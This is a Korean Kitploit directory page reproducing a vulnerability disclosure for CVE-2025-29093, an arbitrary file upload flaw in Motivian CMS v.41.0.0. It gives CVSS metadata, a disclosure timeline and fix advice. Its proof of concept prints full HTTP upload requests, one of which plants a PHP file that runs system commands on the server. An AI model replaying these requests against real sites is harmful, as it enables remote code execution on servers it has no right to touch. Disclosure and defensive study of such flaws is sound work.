Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-29093-Arbitrary-File-Upload — 이 저장소는 Motivian Content Management System v.41.0.0에서 발견된 보안 취약점을 공개합니다. | Kitploit
도구/GitHubGitHub/framarcuccio/cve-2025-29093-arbitrary-file-upload
Vulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration TestingLearning & Education
GitHubframarcuccio/cve-2025-29093-arbitrary-file-upload

CVE-2025-29093-Arbitrary-File-Upload

이 저장소는 Motivian Content Management System v.41.0.0에서 발견된 보안 취약점을 공개합니다.

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기
6개월 전아직 검토되지 않음

CVE-2025-29093 - 임의 파일 업로드

이 저장소는 Motivian Content Management System v.41.0.0에서 발견된 보안 취약점을 공개합니다.

  • CVE-2025-29093: 임의 파일 업로드

이 취약점은 책임 있는 공개 관행에 따라 벤더와 MITRE에 보고되었으며, MITRE는 임시 CVE ID를 할당했습니다. 45일 공개 기간 만료 후 세부 내용이 공개됩니다.

일반 정보

  • 제목: Motivian 임의 파일 업로드
  • 취약점 유형: 임의 파일 업로드
  • 제품 공급업체: Motivian
  • 제품: Motivian Content Management System
  • 영향받는 버전: Motivian CMS v.41.0.0
  • 영향받는 구성 요소: Content/Gallery/Images
  • 공격 경로: 원격
  • 영향: 악의적인 임의 파일 업로드
  • 심각도: 중간
  • CVSSv3 점수: 6.5
  • CVSSv3 벡터: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N
  • CISA-ADP 심각도: 높음
  • CISA-ADP CVSSv3 점수: 8.2
  • CISA-ADP CVSSv3 벡터: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N
  • 발견일: 2025-02-03
  • 발견자: Francesco Marcuccio
  • 상태: 2025년 4월 7일 벤더에 보고됨 - 2025년 5월 22일까지 응답/수정 없음

설명

Motivian Content Management System v.41.0.0의 파일 업로드 취약점으로 인해 원격 공격자가 Content/Gallery/Images 구성 요소를 통해 악성 코드가 포함된 조작된 확장자(예: .php, .png, .txt)의 임의 파일을 업로드할 수 있습니다.

개념 증명

이 취약점은 다양한 확장자의 파일을 업로드하여 악용될 수 있습니다. 시연 목적으로 두 가지 개념 증명 사례가 사용되었습니다. 하나는 악성 코드가 포함된 .php 파일, 다른 하나는 EICAR 테스트 문자열이 포함된 .txt 파일입니다. 두 파일 모두 Content/Gallery/Images 구성 요소를 통해 업로드되었습니다.

아래는 문제를 시연하는 데 사용된 HTTP 요청 및 응답의 전체 기록입니다.

Burp 요청 EICAR

root@kitploit:~
POST /portal/admin/cms/browseManageCmsResources!uploadFile.action HTTP/1.1
Host: [REDACTED]
Content-Length: 808
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary2oYL3KVZBlAQmYAA
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: [REDACTED]
Connection: close

------WebKitFormBoundary2oYL3KVZBlAQmYAA
Content-Disposition: form-data; name="resFolderId"

-8
------WebKitFormBoundary2oYL3KVZBlAQmYAA
Content-Disposition: form-data; name="allowedExtensions"


------WebKitFormBoundary2oYL3KVZBlAQmYAA
Content-Disposition: form-data; name="hidePageComponents"

false
------WebKitFormBoundary2oYL3KVZBlAQmYAA
Content-Disposition: form-data; name="struts.token.name"

token
------WebKitFormBoundary2oYL3KVZBlAQmYAA
Content-Disposition: form-data; name="token"

M53N7SE0QE1Z4MZV4BRV59QW3TSEZ962
------WebKitFormBoundary2oYL3KVZBlAQmYAA
Content-Disposition: form-data; name="uploadResource"; filename="eicar.txt"
Content-Type: text/plain

X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
------WebKitFormBoundary2oYL3KVZBlAQmYAA--

Burp 요청 PHP

root@kitploit:~
POST /portal/admin/cms/browseManageCmsResources!uploadFile.action HTTP/1.1
Host: [REDACTED]
Content-Length: 789
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryLdWSMj4ASbAC9uOz
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: [REDACTED]
Connection: close

------WebKitFormBoundaryLdWSMj4ASbAC9uOz
Content-Disposition: form-data; name="resFolderId"

304802
------WebKitFormBoundaryLdWSMj4ASbAC9uOz
Content-Disposition: form-data; name="allowedExtensions"


------WebKitFormBoundaryLdWSMj4ASbAC9uOz
Content-Disposition: form-data; name="hidePageComponents"

false
------WebKitFormBoundaryLdWSMj4ASbAC9uOz
Content-Disposition: form-data; name="struts.token.name"

token
------WebKitFormBoundaryLdWSMj4ASbAC9uOz
Content-Disposition: form-data; name="token"

77PMJUJH5ZAQTPWRG5TQCLIOR9CUBK0M
------WebKitFormBoundaryLdWSMj4ASbAC9uOz
Content-Disposition: form-data; name="uploadResource"; filename="test.php5"
Content-Type: application/octet-stream

<?php 
echo system('id'); 
?>
------WebKitFormBoundaryLdWSMj4ASbAC9uOz--

Burp 응답

root@kitploit:~
HTTP/1.1 200 OK
Connection: close
Date: Thu, 06 Feb 2025 10:26:29 GMT
Content-Type: text/html;charset=ISO-8859-1
Content-Language: it-IT
Content-Length: 16729

수정 방법

사용자가 임의의 파일을 업로드하지 못하도록 합니다. 엄격한 파일 검증(MIME 유형 및 콘텐츠 검사)을 구현하고, 파일 이름을 무작위화하며, 업로드 디렉터리를 제한합니다.

공개 타임라인

날짜조치
2025-02-06CVE ID 요청 (CNA: MITRE)
2025-04-02CVE ID 할당
2025-04-07취약점을 벤더에 보고

신고자

  • 발견 및 책임 있는 공개:
    Francesco Marcuccio
    사이버보안 컨설턴트, 침투 테스터

  • MITRE 발견자 기여자로 등록됨:
    Francesco Marcuccio
    사이버보안 컨설턴트, 침투 테스터

링크

참조 링크: MITRE NIST

상태

이 CVE ID는 공식적으로 게시(PUBLISHED) 상태입니다. 분석 후 NIST에서 CVSS 점수로 업데이트될 예정입니다.

도구 다운로드
2025-05-31
45일 공개 기간 만료 후 공개 (총 54일)
2025-06-04MITRE 데이터베이스 및 NIST/NVD 포털에 공식 등록 및 입력